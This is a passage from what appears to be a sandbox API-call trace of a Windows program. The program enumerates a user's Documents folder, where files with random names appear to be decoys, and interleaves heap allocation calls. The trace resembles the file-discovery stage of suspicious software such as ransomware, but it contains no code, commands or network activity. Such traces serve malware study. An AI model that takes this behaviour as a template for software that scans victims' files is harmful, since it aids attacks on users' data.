ftCreationTime.dwLowDateTime=0xa350b110, ftCreationTime.dwHighDateTime=0x1d898fa, ftLastAccessTime.dwLowDateTime=0x90501470, ftLastAccessTime.dwHighDateTime=0x1d8a57a, ftLastWriteTime.dwLowDateTime=0x90501470, ftLastWriteTime.dwHighDateTime=0x1d8a57a, nFileSizeHigh=0x0, nFileSizeLow=0xc271, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VgPttkDeNDF2VRfHy.pps", cAlternateFileName="VGPTTK~1.PPS")) returned 1 [0184.934] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa350b110, ftCreationTime.dwHighDateTime=0x1d898fa, ftLastAccessTime.dwLowDateTime=0x90501470, ftLastAccessTime.dwHighDateTime=0x1d8a57a, ftLastWriteTime.dwLowDateTime=0x90501470, ftLastWriteTime.dwHighDateTime=0x1d8a57a, nFileSizeHigh=0x0, nFileSizeLow=0xc271, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VgPttkDeNDF2VRfHy.pps", cAlternateFileName="VGPTTK~1.PPS")) returned 0 [0184.934] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.934] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0184.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.934] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\") returned="Documents\\" [0184.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e84010 [0184.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0184.934] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83fe8 [0184.934] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.934] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.934] PathFindFileNameW (pszPath="") returned="" [0184.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddd38 [0184.935] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x98a34810, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x98a34810, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddd38 | out: hHeap=0x620000) returned 1 [0184.935] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x98a34810, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x98a34810, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.936] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaacd110, ftCreationTime.dwHighDateTime=0x1d8547e, ftLastAccessTime.dwLowDateTime=0x277b5750, ftLastAccessTime.dwHighDateTime=0x1d86422, ftLastWriteTime.dwLowDateTime=0x277b5750, ftLastWriteTime.dwHighDateTime=0x1d86422, nFileSizeHigh=0x0, nFileSizeLow=0xfbbc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0Lepi.xlsx", cAlternateFileName="0LEPI~1.XLS")) returned 1 [0184.936] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46e0c780, ftCreationTime.dwHighDateTime=0x1d89b43, ftLastAccessTime.dwLowDateTime=0xf79abc10, ftLastAccessTime.dwHighDateTime=0x1d89b58, ftLastWriteTime.dwLowDateTime=0xf79abc10, ftLastWriteTime.dwHighDateTime=0x1d89b58, nFileSizeHigh=0x0, nFileSizeLow=0x229f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2oZu1wT.ppt", cAlternateFileName="")) returned 1 [0184.937] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x208b70a0, ftCreationTime.dwHighDateTime=0x1d89c22, ftLastAccessTime.dwLowDateTime=0x961e6050, ftLastAccessTime.dwHighDateTime=0x1d8a084, ftLastWriteTime.dwLowDateTime=0x961e6050, ftLastWriteTime.dwHighDateTime=0x1d8a084, nFileSizeHigh=0x0, nFileSizeLow=0xb3ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3Lz_J5_6ki.docx", cAlternateFileName="3LZ_J5~1.DOC")) returned 1 [0184.937] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff302db0, ftCreationTime.dwHighDateTime=0x1d8869b, ftLastAccessTime.dwLowDateTime=0x116527d0, ftLastAccessTime.dwHighDateTime=0x1d89766, ftLastWriteTime.dwLowDateTime=0x116527d0, ftLastWriteTime.dwHighDateTime=0x1d89766, nFileSizeHigh=0x0, nFileSizeLow=0xd1bd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4COwR1C7ya7.pptx", cAlternateFileName="4COWR1~1.PPT")) returned 1 [0184.937] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfc5f60, ftCreationTime.dwHighDateTime=0x1d8a3af, ftLastAccessTime.dwLowDateTime=0xfd1be6e0, ftLastAccessTime.dwHighDateTime=0x1d8a70c, ftLastWriteTime.dwLowDateTime=0xfd1be6e0, ftLastWriteTime.dwHighDateTime=0x1d8a70c, nFileSizeHigh=0x0, nFileSizeLow=0x18fd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4l3gkybFjpw5wc.rtf", cAlternateFileName="4L3GKY~1.RTF")) returned 1 [0184.937] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26a5f650, ftCreationTime.dwHighDateTime=0x1d8a496, ftLastAccessTime.dwLowDateTime=0x68874390, ftLastAccessTime.dwHighDateTime=0x1d8a5ad, ftLastWriteTime.dwLowDateTime=0x68874390, ftLastWriteTime.dwHighDateTime=0x1d8a5ad, nFileSizeHigh=0x0, nFileSizeLow=0x11c2e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="567c.pdf", cAlternateFileName="")) returned 1 [0184.937] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10e4d6f0, ftCreationTime.dwHighDateTime=0x1d86081, ftLastAccessTime.dwLowDateTime=0x8b79a590, ftLastAccessTime.dwHighDateTime=0x1d87c9b, ftLastWriteTime.dwLowDateTime=0x8b79a590, ftLastWriteTime.dwHighDateTime=0x1d87c9b, nFileSizeHigh=0x0, nFileSizeLow=0xf560, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5h1GruRzAZNE.docx", cAlternateFileName="5H1GRU~1.DOC")) returned 1 [0184.937] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fcb7660, ftCreationTime.dwHighDateTime=0x1d89d98, ftLastAccessTime.dwLowDateTime=0x835f4b40, ftLastAccessTime.dwHighDateTime=0x1d89e37, ftLastWriteTime.dwLowDateTime=0x835f4b40, ftLastWriteTime.dwHighDateTime=0x1d89e37, nFileSizeHigh=0x0, nFileSizeLow=0x11f24, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6LeN1-BfLiBS.rtf", cAlternateFileName="6LEN1-~1.RTF")) returned 1 [0184.937] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d5aa80, ftCreationTime.dwHighDateTime=0x1d8228d, ftLastAccessTime.dwLowDateTime=0x60f04020, ftLastAccessTime.dwHighDateTime=0x1d867bc, ftLastWriteTime.dwLowDateTime=0x60f04020, ftLastWriteTime.dwHighDateTime=0x1d867bc, nFileSizeHigh=0x0, nFileSizeLow=0x797, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bMPGAJ9.xlsx", cAlternateFileName="BMPGAJ~1.XLS")) returned 1 [0184.937] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c00ae80, ftCreationTime.dwHighDateTime=0x1d8a2d0, ftLastAccessTime.dwLowDateTime=0x57a24f70, ftLastAccessTime.dwHighDateTime=0x1d8a602, ftLastWriteTime.dwLowDateTime=0x57a24f70, ftLastWriteTime.dwHighDateTime=0x1d8a602, nFileSizeHigh=0x0, nFileSizeLow=0x4cd2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cqA0H3g9.ppt", cAlternateFileName="")) returned 1 [0184.937] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0edcca0, ftCreationTime.dwHighDateTime=0x1d869d3, ftLastAccessTime.dwLowDateTime=0xb8fd3f00, ftLastAccessTime.dwHighDateTime=0x1d89acc, ftLastWriteTime.dwLowDateTime=0xb8fd3f00, ftLastWriteTime.dwHighDateTime=0x1d89acc, nFileSizeHigh=0x0, nFileSizeLow=0x5194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CzDS-.pptx", cAlternateFileName="CZDS-~1.PPT")) returned 1 [0184.937] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70dc0e70, ftCreationTime.dwHighDateTime=0x1d872b0, ftLastAccessTime.dwLowDateTime=0x9dd33a00, ftLastAccessTime.dwHighDateTime=0x1d889c8, ftLastWriteTime.dwLowDateTime=0x9dd33a00, ftLastWriteTime.dwHighDateTime=0x1d889c8, nFileSizeHigh=0x0, nFileSizeLow=0x17b81, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D1q0P.docx", cAlternateFileName="D1Q0P~1.DOC")) returned 1 [0184.937] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e8588a0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.937] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28786a0, ftCreationTime.dwHighDateTime=0x1d81ec0, ftLastAccessTime.dwLowDateTime=0xf7b486e0, ftLastAccessTime.dwHighDateTime=0x1d84059, ftLastWriteTime.dwLowDateTime=0xf7b486e0, ftLastWriteTime.dwHighDateTime=0x1d84059, nFileSizeHigh=0x0, nFileSizeLow=0xf2a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DIjVxXA4.xlsx", cAlternateFileName="DIJVXX~1.XLS")) returned 1 [0184.937] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c62710, ftCreationTime.dwHighDateTime=0x1d8a5b9, ftLastAccessTime.dwLowDateTime=0x67b88a00, ftLastAccessTime.dwHighDateTime=0x1d8a63e, ftLastWriteTime.dwLowDateTime=0x67b88a00, ftLastWriteTime.dwHighDateTime=0x1d8a63e, nFileSizeHigh=0x0, nFileSizeLow=0x17789, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dnScTZWStNYxBfiQs.docx", cAlternateFileName="DNSCTZ~1.DOC")) returned 1 [0184.937] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebdc3c0, ftCreationTime.dwHighDateTime=0x1d81bce, ftLastAccessTime.dwLowDateTime=0xdfe20db0, ftLastAccessTime.dwHighDateTime=0x1d840e2, ftLastWriteTime.dwLowDateTime=0xdfe20db0, ftLastWriteTime.dwHighDateTime=0x1d840e2, nFileSizeHigh=0x0, nFileSizeLow=0x912a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DygX.docx", cAlternateFileName="DYGX~1.DOC")) returned 1 [0184.937] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99e06ff0, ftCreationTime.dwHighDateTime=0x1d82486, ftLastAccessTime.dwLowDateTime=0xba0990a0, ftLastAccessTime.dwHighDateTime=0x1d8898e, ftLastWriteTime.dwLowDateTime=0xba0990a0, ftLastWriteTime.dwHighDateTime=0x1d8898e, nFileSizeHigh=0x0, nFileSizeLow=0x15ba2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HbBtrfj.pptx", cAlternateFileName="HBBTRF~1.PPT")) returned 1 [0184.937] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e49bc00, ftCreationTime.dwHighDateTime=0x1d89cfb, ftLastAccessTime.dwLowDateTime=0x4f017610, ftLastAccessTime.dwHighDateTime=0x1d8a62b, ftLastWriteTime.dwLowDateTime=0x4f017610, ftLastWriteTime.dwHighDateTime=0x1d8a62b, nFileSizeHigh=0x0, nFileSizeLow=0x4fd9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HeOaqMZgOojF528t.odt", cAlternateFileName="HEOAQM~1.ODT")) returned 1 [0184.937] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x25c9eb00, ftCreationTime.dwHighDateTime=0x1d89ace, ftLastAccessTime.dwLowDateTime=0xf19708e0, ftLastAccessTime.dwHighDateTime=0x1d89e4c, ftLastWriteTime.dwLowDateTime=0xf19708e0, ftLastWriteTime.dwHighDateTime=0x1d89e4c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hhuy", cAlternateFileName="")) returned 1 [0184.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0184.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0184.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac90 [0184.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0184.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0184.938] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bf9b870, ftCreationTime.dwHighDateTime=0x1d89d24, ftLastAccessTime.dwLowDateTime=0x8710a7e0, ftLastAccessTime.dwHighDateTime=0x1d8a1c3, ftLastWriteTime.dwLowDateTime=0x8710a7e0, ftLastWriteTime.dwHighDateTime=0x1d8a1c3, nFileSizeHigh=0x0, nFileSizeLow=0xd538, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="J0ThFcHeulkvK.odp", cAlternateFileName="J0THFC~1.ODP")) returned 1 [0184.938] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0876f0, ftCreationTime.dwHighDateTime=0x1d85019, ftLastAccessTime.dwLowDateTime=0x2fe6a6a0, ftLastAccessTime.dwHighDateTime=0x1d88296, ftLastWriteTime.dwLowDateTime=0x2fe6a6a0, ftLastWriteTime.dwHighDateTime=0x1d88296, nFileSizeHigh=0x0, nFileSizeLow=0xd6cb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jw5nfUjDO04Vpw2Wo.xlsx", cAlternateFileName="JW5NFU~1.XLS")) returned 1 [0184.938] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29a879a0, ftCreationTime.dwHighDateTime=0x1d89a5e, ftLastAccessTime.dwLowDateTime=0xa1b4cd00, ftLastAccessTime.dwHighDateTime=0x1d89bbb, ftLastWriteTime.dwLowDateTime=0xa1b4cd00, ftLastWriteTime.dwHighDateTime=0x1d89bbb, nFileSizeHigh=0x0, nFileSizeLow=0x177e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="K0lcD1nSajNFFT.odp", cAlternateFileName="K0LCD1~1.ODP")) returned 1 [0184.938] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16b08bd0, ftCreationTime.dwHighDateTime=0x1d8a3fa, ftLastAccessTime.dwLowDateTime=0x20c101e0, ftLastAccessTime.dwHighDateTime=0x1d8a46d, ftLastWriteTime.dwLowDateTime=0x20c101e0, ftLastWriteTime.dwHighDateTime=0x1d8a46d, nFileSizeHigh=0x0, nFileSizeLow=0x16086, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KUOP p2txHoo7bw7O.doc", cAlternateFileName="KUOPP2~1.DOC")) returned 1 [0184.938] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe071b010, ftCreationTime.dwHighDateTime=0x1d89d93, ftLastAccessTime.dwLowDateTime=0x92457ac0, ftLastAccessTime.dwHighDateTime=0x1d8a3d8, ftLastWriteTime.dwLowDateTime=0x92457ac0, ftLastWriteTime.dwHighDateTime=0x1d8a3d8, nFileSizeHigh=0x0, nFileSizeLow=0x3913, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KW5J7A5.doc", cAlternateFileName="")) returned 1 [0184.938] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd38bdf0, ftCreationTime.dwHighDateTime=0x1d897ef, ftLastAccessTime.dwLowDateTime=0x880cd7f0, ftLastAccessTime.dwHighDateTime=0x1d8a05f, ftLastWriteTime.dwLowDateTime=0x880cd7f0, ftLastWriteTime.dwHighDateTime=0x1d8a05f, nFileSizeHigh=0x0, nFileSizeLow=0x56f7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="m tTnqTecinKd5iUv7o.ots", cAlternateFileName="MTTNQT~1.OTS")) returned 1 [0184.938] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d4a2f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d4a2f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d4a2f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0184.938] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0184.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0184.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfc) returned 0x2c73318 [0184.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccadf0 [0184.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccae48 [0184.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaea0 [0184.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4588 [0184.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0184.939] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaef8 [0184.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccab30 | out: hHeap=0x620000) returned 1 [0184.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0184.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0184.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb46c0 | out: hHeap=0x620000) returned 1 [0184.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0184.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac90 | out: hHeap=0x620000) returned 1 [0184.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c6ead8 | out: hHeap=0x620000) returned 1 [0184.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac90 [0184.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0184.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0184.941] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d4a2f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d4a2f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d4a2f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0184.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0184.941] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb46c0 [0184.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0184.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb46c0 | out: hHeap=0x620000) returned 1 [0184.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0184.942] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d4a2f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d4a2f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d4a2f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0184.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0184.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0184.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad40 [0184.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0184.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0184.943] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4d6f7390, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x21e55d50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x21e55d50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0184.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0184.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb46c0 [0184.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16c) returned 0x2c7a838 [0184.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0184.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0184.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0184.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4790 [0184.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb47f8 [0184.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccab30 [0184.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaf50 [0184.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4860 [0184.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2e94a80 [0184.944] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccadf0 | out: hHeap=0x620000) returned 1 [0184.944] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccae48 | out: hHeap=0x620000) returned 1 [0184.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaea0 | out: hHeap=0x620000) returned 1 [0184.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4588 | out: hHeap=0x620000) returned 1 [0184.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0184.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaef8 | out: hHeap=0x620000) returned 1 [0184.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac90 | out: hHeap=0x620000) returned 1 [0184.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0184.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad40 | out: hHeap=0x620000) returned 1 [0184.947] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 